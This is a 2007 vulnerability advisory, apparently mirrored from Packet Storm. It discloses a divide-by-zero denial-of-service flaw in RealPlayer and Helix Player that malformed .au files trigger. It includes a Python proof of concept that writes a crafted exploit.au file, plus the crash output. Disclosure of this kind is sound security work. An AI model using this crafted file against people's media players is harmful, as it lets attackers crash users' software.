Vulners
Lucene search
OS2A_1010.txt
🗓️ 11 Sep 2007 00:00:00Reported by Arun KethipellyType 
packetstorm🔗 packetstormsecurity.com👁 24 Views
`RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability
OS2A ID: OS2A_1010 08/21/2007 Issue Discovered
08/31/2007 Vendor Notification
Class: Denial of Service Severity: High
Overview:
-------------
RealPlayer/Helix Player is a media player that will play popular media formats
as well as organize your music and videos.
Description:
--------------
A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user
tries to open a malformed .au file. The flaw is due to a Division by Zero error
when processing a malformed AU file.
An attacker must entice an unsuspecting user to open a maliciously crafted AU
file.
Impact:
--------
Successful exploitation allows an attacker to crash a vulnerable application
via a specially crafted file. (Deny the service).
Affected Software(s):
---------------------
Realplayer 10.1.0.3114 and prior
Helixplayer
Tested on :
- RealPlayer-10.1.0.3114
- Realplayer-10.0.9
- Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively
- Realplayer10-5Gold on Windows XP
- HelixPlayer-1.0.6.778 on FC6
AV MP3 Player and Media Player Classic are also found to be vulnerable
Affected Platform:
------------------
Microsoft Windows (All Platform)
RedHat Linux
Fedora Core Linux
SuSE Linux
Proof of Concept:
------------------
The following Python program will generate a malformed .au file
import sys
import os
head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+
"\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +
"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")
print "[x] RealPlayer/Helix Player/Kaboodle Player DoS"
try:
f = open("exploit.au",'w')
except IOError, e:
print "Unable to open file ", e
sys.exit(0)
print "[x] File successfully opened for writing."
try:
f.write(head)
except IOError, e:
print "Unable to write to file ", e
sys.exit(0)
print "[x] File successfully written."
f.close()
print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players."
#End of program
RealPlayer crashes with the following exception,
Floating point exception$REALPLAYBIN "$@"
CVSS Score Report:
------------------
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
CVSS Temporal Score = 6.4
Risk factor = High
Reference:
-----------
A similar attack was found recently against Windows Media Player,
http://www.safehack.com/exp/mp/mplayer11.txt
Solution/Work Around:
--------------------
Do not open untrusted .au files.
Credits:
--------
Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this
vulnerability.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4